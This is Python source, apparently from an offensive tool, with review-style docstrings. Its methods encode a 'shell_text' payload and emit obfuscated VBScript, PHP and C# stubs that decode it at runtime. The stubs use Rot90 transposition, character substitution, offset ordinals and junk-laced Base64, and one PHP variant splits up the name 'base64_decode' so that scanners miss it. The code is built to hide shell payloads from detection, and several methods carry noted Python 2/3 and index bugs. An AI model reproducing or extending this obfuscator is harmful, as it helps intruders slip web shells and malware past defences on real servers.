def RotPlus(self):
    """Return VBScript-syntax text that rebuilds a Rot90-encoded string.

    ``Encoders(...).Rot90()`` supplies the encoded text and a row count.
    The emitted script appends the text to one variable piece by piece.
    It then walks that variable in strides of ``rows`` characters, appending
    character ``r`` of each stride to element ``r`` of an array.
    Finally it joins and trims the array into the result variable.

    Side effect: ``self.vars`` is replaced by four names taken from
    ``self.makeVars()`` (holder, row count, bucket array, result).

    Reviewer note: identifiers come from ``makeVars()`` and the literal
    pieces from ``makeVals()``, both defined outside this view. What this
    method itself fixes in the output is the statement shape: a run of
    ``x = x & "..."`` appends followed by the nested ``for``/``mid`` loop
    and the closing ``trim(join(...))``.
    """
    def escape_vbs(text):
        # Double embedded quotes, then splice newline and tab back in via
        # chr() concatenation instead of leaving them inside the literal.
        doubled = text.replace('"', '""')
        spliced = doubled.replace('\n', '" & chr(10) & "')
        return spliced.replace('\t', '" & chr(9) & "')

    shell_encoded, rows = Encoders(self.Executable(self.shell_text)).Rot90()
    vals = self.makeVals(shell_encoded)
    self.vars = [self.makeVars() for _ in range(4)]
    holder, width, buckets, result = self.vars
    row_count = str(rows)

    script = [
        'dim ' + holder + ', ' + width + ', ' + buckets + '(' + row_count
        + '), ' + result + ', i, r \n',
        width + ' = ' + row_count + ' \n',
        holder + ' = "" \n',
    ]
    for piece in vals:
        script.append(
            holder + ' = ' + holder + ' & "' + escape_vbs(piece) + '" \n')
    script.append(
        'for i = 0 to (len(' + holder + ') / ' + width + ') - 1 \n')
    script.append('for r = 1 to ' + width + ' : ')
    script.append(
        buckets + '(r) = ' + buckets + '(r) & mid(' + holder
        + ', r + i * ' + width + ', 1) : next \n')
    script.append('next \n')
    script.append(result + ' = trim(join(' + buckets + ', "")) \n')
    return ''.join(script)
def Random(self):
    """Return VBScript-syntax text that undoes a character substitution.

    ``Encoders(...).Random()`` supplies the encoded text and two character
    strings, ``cs1`` and ``cs2``. The emitted script stores the text in a
    holder variable, ``cs2`` in the second variable and ``cs1`` in the third.
    It then visits the holder one character at a time. A character that
    occurs in the ``cs1`` variable is replaced by the ``cs1`` character at
    the index where it occurs in the ``cs2`` variable. Any other character
    is copied through unchanged.

    Side effect: ``self.vars`` is replaced by four names taken from
    ``self.makeVars()`` (holder, cs2, cs1, result).

    Reviewer note: the fixed part of the output is the per-character
    ``for``/``instr``/``mid`` loop with its two ``if ... then`` lines; the
    identifiers and literal contents are supplied from outside this view.
    """
    def escape_vbs(raw):
        # NOTE(review): assumes Python 2 str semantics; on Python 3 encode()
        # returns bytes and the str-argument replace() calls would raise.
        text = raw.encode('unicode-escape')
        text = text.replace('"', '""')
        # unicode-escape doubles backslashes and spells newline/tab as
        # two-character escapes; collapse the former, route the latter
        # through chr().
        text = text.replace('\\\\', '\\')
        text = text.replace('\\n', '" & chr(10) & "')
        return text.replace('\\t', '" & chr(9) & "')

    shell_encoded, cs1, cs2 = Encoders(
        self.Executable(self.shell_text)).Random()
    vals = self.makeVals(shell_encoded)
    self.vars = [self.makeVars() for _ in range(4)]
    holder, cs2_var, cs1_var, result = self.vars
    current = 'mid(' + holder + ', i, 1)'

    script = [
        'dim ' + holder + ', ' + cs2_var + ', ' + cs1_var + ', ' + result
        + ' \n',
        result + ' = "" \n',
        holder + ' = "" \n',
    ]
    for piece in vals:
        script.append(
            holder + ' = ' + holder + ' & "' + escape_vbs(piece) + '" \n')
    script.append(cs2_var + ' = "' + escape_vbs(cs2) + '" \n')
    script.append(cs1_var + ' = "' + escape_vbs(cs1) + '" \n')
    script.append('for i = 1 to len(' + holder + ') \n')
    script.append('if instr(1, ' + cs1_var + ', ' + current + ') > 0 then ')
    script.append(
        result + ' = ' + result + ' & mid(' + cs1_var + ', instr(1, '
        + cs2_var + ', ' + current + '), 1) \n')
    script.append('if instr(1, ' + cs1_var + ', ' + current + ') = 0 then ')
    script.append(result + ' = ' + result + ' & ' + current + ' \n')
    script.append('next \n')
    return ''.join(script)
def OrdPlus(self):
    """Return PHP-syntax text that decodes an offset-ordinal encoding.

    ``Encoders(...).OrdPlus()`` supplies the encoded text, a numeric offset
    and a separator string. The emitted code appends the text to a holder
    variable and splits it on the separator with ``explode``. It then
    appends ``chr(token - offset)`` for every token to the result variable.

    Side effect: ``self.vars`` is replaced by three ``$``-prefixed names
    taken from ``self.makeVars()`` (holder, loop token, result).

    Reviewer note: pieces from ``makeVals()`` are inserted between double
    quotes without escaping, so the method relies on the encoded text
    containing nothing PHP would interpret there (presumably digits and
    the separator only; confirm against ``Encoders.OrdPlus``).
    """
    shell_encoded, ord_plus, chr_join = Encoders(self.shell_text).OrdPlus()
    vals = self.makeVals(shell_encoded)
    self.vars = ['$' + self.makeVars() for _ in range(3)]
    holder, token, result = self.vars

    script = [result + ' = ""; \n', holder + ' = ""; \n']
    script.extend(holder + ' .= "' + piece + '"; \n' for piece in vals)
    script.append(
        'foreach(explode("' + chr_join + '", ' + holder + ') as ' + token
        + ') ')
    script.append(
        result + ' .= chr(' + token + ' - ' + str(ord_plus) + '); \n')
    return ''.join(script)
def Base64(self):
    """Return C#-syntax text that strips a junk marker and Base64-decodes.

    ``Encoders(...).Base64()`` supplies the encoded text. ``makeJunk`` and
    ``makeVals`` (defined outside this view) supply a junk string and the
    literal pieces. The emitted code appends the pieces to one string and
    declares a second string. The second string is assigned
    ``Encoding.UTF8.GetString(Convert.FromBase64String(...))`` applied to a
    ``.Replace(@"<junk>", "")`` call.

    Side effect: ``self.vars`` is extended, not replaced, with six names
    from ``self.makeVars()``.

    NOTE(review): the accumulated string is ``self.vars[4]`` but the
    ``Replace`` call is emitted on ``self.vars[1]``. What index 1 names
    depends on the contents of ``self.vars`` before this call; confirm
    against the caller.

    Reviewer note: ``Convert.FromBase64String(`` and the verbatim-string
    ``.Replace(@"`` are emitted literally regardless of the generated names.
    """
    shell_encoded = Encoders(self.shell_text).Base64()
    junk = self.makeJunk(shell_encoded, self.an_chars)
    vals = self.makeVals(shell_encoded, junk)
    self.vars += [self.makeVars() for _ in range(6)]
    holder = self.vars[4]
    result = self.vars[5]
    source = self.vars[1]

    script = ['string ' + holder + ' = ""; \n']
    for piece in vals:
        script.append(holder + ' += "' + piece + '"; \n')
    script.append('string ' + result + ' = Encoding.UTF8.GetString(')
    script.append(
        'Convert.FromBase64String(' + source + '.Replace(@"' + junk
        + '", ""))); \n')
    return ''.join(script)
def OrdPlus(self):
    """Return C#-syntax text that decodes an offset-ordinal encoding.

    ``Encoders(...).OrdPlus()`` supplies the encoded text, a numeric offset
    and a separator. The emitted code appends the text to a holder string
    and splits it with ``.Split('<separator>')``. For each token it appends
    ``(char)(Convert.ToInt32(token) - offset)`` to the result string.

    Side effect: ``self.vars`` is replaced by seven names taken from
    ``self.makeVars()``. Only indices 4 (holder), 5 (loop token) and
    6 (result) appear in the output of this method.

    Reviewer note: the separator is emitted inside single quotes, so the
    generated C# only compiles if it is a single character (presumably
    guaranteed by ``Encoders.OrdPlus``; confirm).
    """
    shell_encoded, ord_plus, chr_join = Encoders(self.shell_text).OrdPlus()
    vals = self.makeVals(shell_encoded)
    self.vars = [self.makeVars() for _ in range(7)]
    holder, token, result = self.vars[4:7]

    script = [
        'string ' + result + ' = ""; \n',
        'string ' + holder + ' = ""; \n',
    ]
    script.extend(holder + ' += "' + piece + '"; \n' for piece in vals)
    script.append(
        'foreach(string ' + token + ' in ' + holder + '.Split(\''
        + chr_join + '\')) { ')
    script.append(
        result + ' += (char)(Convert.ToInt32(' + token + ') - '
        + str(ord_plus) + '); } \n')
    return ''.join(script)
def Random(self):
    """Return PHP-syntax text that undoes a character substitution.

    ``Encoders(...).Random()`` supplies the encoded text and two character
    strings, ``cs1`` and ``cs2``. The emitted code stores the text in a
    holder variable and iterates it with ``str_split``. A character found
    in the ``cs2`` variable by ``strpos`` is replaced by the ``cs1``
    character at that index. Any other character is copied unchanged.

    Side effect: ``self.vars`` is replaced by four ``$``-prefixed names
    taken from ``self.makeVars()`` (holder, cs1, cs2, result).

    Reviewer note: the loop variable ``$c`` and the
    ``strpos(...) === false`` ternary are emitted literally and do not vary
    with the generated names.
    """
    def escape_php(raw):
        # Escape for a PHP double-quoted literal: quotes and '$' (which
        # would otherwise start variable interpolation).
        # NOTE(review): assumes Python 2 str semantics; on Python 3 encode()
        # returns bytes and the str-argument replace() calls would raise.
        text = raw.encode('unicode-escape')
        text = text.replace('"', '\\"')
        return text.replace("$", "\\$")

    shell_encoded, cs1, cs2 = Encoders(self.shell_text).Random()
    vals = self.makeVals(shell_encoded)
    self.vars = ['$' + self.makeVars() for _ in range(4)]
    holder, cs1_var, cs2_var, result = self.vars

    script = [result + ' = ""; \n', holder + ' = ""; \n']
    for piece in vals:
        script.append(holder + ' .= "' + escape_php(piece) + '"; \n')
    script.append(cs1_var + ' = "' + escape_php(cs1) + '"; \n')
    script.append(cs2_var + ' = "' + escape_php(cs2) + '"; \n')
    script.append('foreach(str_split(' + holder + ') as $c) { ')
    script.append(
        result + ' .= (strpos(' + cs2_var + ', $c) === false) ? $c : ')
    script.append(cs1_var + '[strpos(' + cs2_var + ', $c)]; } \n')
    return ''.join(script)
def Base64(self):
    """Return PHP-syntax text that strips a junk marker and Base64-decodes.

    ``Encoders(...).Base64()`` supplies the encoded text. ``makeJunk`` is
    given that text plus the string ``base64_decode`` and returns a junk
    string. The emitted code appends the literal pieces to a holder, then
    removes the junk from it with ``str_replace``. It rebuilds the name
    ``base64_decode`` from a literal that has the junk interleaved between
    every character, and calls the rebuilt name as a variable function on
    the cleaned text.

    Side effect: ``self.vars`` is extended, not replaced, with four
    ``$``-prefixed names. The output uses indices 0-3, so which names those
    are depends on what ``self.vars`` held on entry; confirm with the caller.

    Reviewer note: the contiguous string ``base64_decode`` does not appear
    in the output. The two ``str_replace( "<junk>", "", ...)`` statements
    and the ``$name( $arg )`` call are emitted literally.
    """
    shell_encoded = Encoders(self.shell_text).Base64()
    junk = self.makeJunk(shell_encoded + 'base64_decode', self.an_chars)
    vals = self.makeVals(shell_encoded, junk)
    self.vars += ['$' + self.makeVars() for _ in range(4)]
    holder, cleaned, func, result = self.vars[:4]
    # Junk goes between every character, including around the quotes.
    b64 = junk.join('"base64_decode"')

    script = [holder + ' = ""; \n']
    script.extend(holder + ' .= "' + piece + '"; \n' for piece in vals)
    script.append(
        cleaned + ' = str_replace( "' + junk + '", "", ' + holder
        + ' ); \n')
    script.append(
        func + ' = str_replace( "' + junk + '", "", ' + b64 + ' ); \n')
    script.append(result + ' = ' + func + '( ' + cleaned + ' ); \n')
    return ''.join(script)
def Random(self):
    """Return C#-syntax text that undoes a character substitution.

    ``Encoders(...).Random()`` supplies the encoded text and two character
    strings, ``cs1`` and ``cs2``. The emitted code declares both as strings
    and appends the text to a holder. In a ``foreach(char c in holder)``
    loop, a character contained in the ``cs2`` string is replaced by the
    ``cs1`` character at ``IndexOf(c)``. Any other character is copied
    unchanged.

    Side effect: ``self.vars`` is replaced by eight names taken from
    ``self.makeVars()``. Only indices 4 (cs1), 5 (holder), 6 (cs2) and
    7 (result) appear in the output of this method.

    Reviewer note: the loop header ``foreach(char c in`` and the
    ``.Contains(c.ToString()) ? ... : c`` ternary are emitted literally.
    """
    def escape_cs(raw):
        # NOTE(review): assumes Python 2 str semantics; on Python 3 encode()
        # returns bytes and the str-argument replace() would raise.
        return raw.encode('unicode-escape').replace('"', '\\"')

    shell_encoded, cs1, cs2 = Encoders(self.shell_text).Random()
    vals = self.makeVals(shell_encoded)
    self.vars = [self.makeVars() for _ in range(8)]
    cs1_var, holder, cs2_var, result = self.vars[4:8]

    script = [
        'string ' + result + ' = ""; \n',
        'string ' + cs1_var + ' = "' + escape_cs(cs1) + '"; \n',
        'string ' + cs2_var + ' = "' + escape_cs(cs2) + '"; \n',
        'string ' + holder + ' = ""; \n',
    ]
    for piece in vals:
        script.append(holder + ' += "' + escape_cs(piece) + '"; \n')
    script.append('foreach(char c in ' + holder + ') { ')
    script.append(
        result + ' += ' + cs2_var + '.Contains(c.ToString()) ? ')
    script.append(cs1_var + '[' + cs2_var + '.IndexOf(c)] : c; } \n')
    return ''.join(script)
def OrdPlus(self):
    """Return VBScript-syntax text that decodes an offset-ordinal encoding.

    ``Encoders(...).OrdPlus()`` is applied to
    ``self.Executable(self.shell_text)`` and supplies the encoded text, a
    numeric offset and a separator. The emitted script appends the text to
    a holder and splits it on the separator. It then appends
    ``chr(token - offset)`` for each token to the result variable.

    Side effect: ``self.vars`` is replaced by three names taken from
    ``self.makeVars()`` (holder, loop token, result).

    Reviewer note: the ``for each ... in split(...)`` loop and the
    ``chr(x - N)`` expression are emitted literally; only the names, the
    offset and the separator vary.
    """
    shell_encoded, ord_plus, chr_join = Encoders(
        self.Executable(self.shell_text)).OrdPlus()
    vals = self.makeVals(shell_encoded)
    self.vars = [self.makeVars() for _ in range(3)]
    holder, token, result = self.vars

    script = [
        'dim ' + holder + ', ' + token + ', ' + result + ' \n',
        result + ' = "" \n',
        holder + ' = "" \n',
    ]
    script.extend(
        holder + ' = ' + holder + ' & "' + piece + '" \n' for piece in vals)
    script.append(
        'for each ' + token + ' in split(' + holder + ', "' + chr_join
        + '") : ')
    script.append(
        result + ' = ' + result + ' & chr(' + token + ' - '
        + str(ord_plus) + ') : next \n')
    return ''.join(script)
def Base64(self):
    """Return VBScript-syntax text that strips a junk marker and decodes.

    ``Encoders(...).Base64()`` is applied to
    ``self.Executable(self.shell_text)``. ``makeJunk`` and ``makeVals``
    (defined outside this view) supply a junk string and the literal
    pieces. The emitted script appends the pieces to a holder and inlines
    the module-level ``VBS_B64`` text. It then instantiates ``new Base64``,
    removes the junk with ``Replace`` and calls ``.Decode`` on the cleaned
    text.

    Side effect: ``self.vars`` is extended, not replaced, with four names.
    The output uses indices 0-3, so which names those are depends on what
    ``self.vars`` held on entry; confirm with the caller.

    Reviewer note: ``VBS_B64`` is a constant defined elsewhere in the file,
    presumably a VBScript ``Base64`` class definition (confirm). It is
    copied into every output of this method alongside the literal
    ``new Base64`` and ``.Decode(`` tokens.
    """
    shell_encoded = Encoders(self.Executable(self.shell_text)).Base64()
    junk = self.makeJunk(shell_encoded, self.an_chars)
    vals = self.makeVals(shell_encoded, junk)
    self.vars += [self.makeVars() for _ in range(4)]
    holder, decoder, cleaned, result = self.vars[:4]

    script = [
        'dim ' + holder + ', ' + decoder + ', ' + cleaned + ', ' + result
        + ' \n',
        holder + ' = "" \n',
    ]
    for piece in vals:
        script.append(holder + ' = ' + holder + ' & "' + piece + '" \n')
    script.append(VBS_B64 + ' \nset ' + decoder + ' = new Base64 \n')
    script.append(
        cleaned + ' = Replace( ' + holder + ', "' + junk + '", "") \n')
    script.append(
        result + ' = ' + decoder + '.Decode( ' + cleaned + ' ) \n')
    return ''.join(script)
def RotPlus(self):
    """Return C#-syntax text that rebuilds a Rot90-encoded string.

    ``Encoders(...).Rot90()`` supplies the encoded text and a row count.
    The emitted code declares the count and a ``string[]`` of that size,
    then appends the text to a holder. It walks the holder in strides of
    ``rows`` characters, appending character ``r`` of each stride to array
    element ``r``. Finally it assigns ``String.Join("", array).Trim()`` to
    the result.

    Side effect: ``self.vars`` is replaced by eight names taken from
    ``self.makeVars()``. Only indices 4 (holder), 5 (row count),
    6 (bucket array) and 7 (result) appear in the output of this method.

    Reviewer note: the loop counters ``i`` and ``r`` and the
    ``[r + i * n]`` index expression are emitted literally.
    """
    def escape_cs(raw):
        # NOTE(review): assumes Python 2 str semantics; on Python 3 encode()
        # returns bytes and the str-argument replace() would raise.
        return raw.encode('unicode-escape').replace('"', '\\"')

    shell_encoded, rows = Encoders(self.shell_text).Rot90()
    vals = self.makeVals(shell_encoded)
    self.vars = [self.makeVars() for _ in range(8)]
    holder, width, buckets, result = self.vars[4:8]
    row_count = str(rows)

    script = [
        'int ' + width + ' = ' + row_count + '; \n',
        'string[] ' + buckets + ' = new string[' + row_count + ']; \n',
        'string ' + holder + ' = "" ; \n',
    ]
    for piece in vals:
        script.append(holder + ' += "' + escape_cs(piece) + '"; \n')
    script.append(
        'for(int i = 0; i < ' + holder + '.Length / ' + width + '; i++) ')
    script.append('{ for(int r = 0; r < ' + width + '; r++) ')
    script.append(
        buckets + '[r] += ' + holder + '[r + i * ' + width + ']; } \n')
    script.append(
        'string ' + result + ' = String.Join("", ' + buckets
        + ').Trim(); \n')
    return ''.join(script)
def RotPlus(self):
    """Return PHP-syntax text that rebuilds a Rot90-encoded string.

    ``Encoders(...).Rot90()`` supplies the encoded text and a row count.
    The emitted code stores the count and fills an array with that many
    empty strings, then appends the text to a holder. It walks the holder
    in strides of ``rows`` characters, appending character ``$r`` of each
    stride to array element ``$r``. Finally it assigns
    ``trim(implode("", array))`` to the result.

    Side effect: ``self.vars`` is replaced by four ``$``-prefixed names
    taken from ``self.makeVars()`` (holder, row count, bucket array,
    result).

    Reviewer note: the loop counters ``$i`` and ``$r`` and the
    ``[$r + $i * $n]`` index expression are emitted literally.
    """
    def escape_php(raw):
        # Escape for a PHP double-quoted literal: quotes and '$' (which
        # would otherwise start variable interpolation).
        # NOTE(review): assumes Python 2 str semantics; on Python 3 encode()
        # returns bytes and the str-argument replace() calls would raise.
        text = raw.encode('unicode-escape')
        text = text.replace('"', '\\"')
        return text.replace("$", "\\$")

    shell_encoded, rows = Encoders(self.shell_text).Rot90()
    vals = self.makeVals(shell_encoded)
    self.vars = ['$' + self.makeVars() for _ in range(4)]
    holder, width, buckets, result = self.vars

    script = [
        width + ' = ' + str(rows) + '; \n',
        buckets + ' = array(); \n',
        holder + ' = "" ; \n',
    ]
    for piece in vals:
        script.append(holder + ' .= "' + escape_php(piece) + '"; \n')
    script.append(
        'for($i = 0; $i < ' + width + '; $i++) ' + buckets + '[] = ""; \n')
    script.append(
        'for($i = 0; $i < (strlen(' + holder + ') / ' + width
        + '); $i++) ')
    script.append('{ for($r = 0; $r < ' + width + '; $r++) ')
    script.append(
        buckets + '[$r] .= ' + holder + '[$r + $i * ' + width + ']; } \n')
    script.append(result + ' = trim(implode("", ' + buckets + ')); \n')
    return ''.join(script)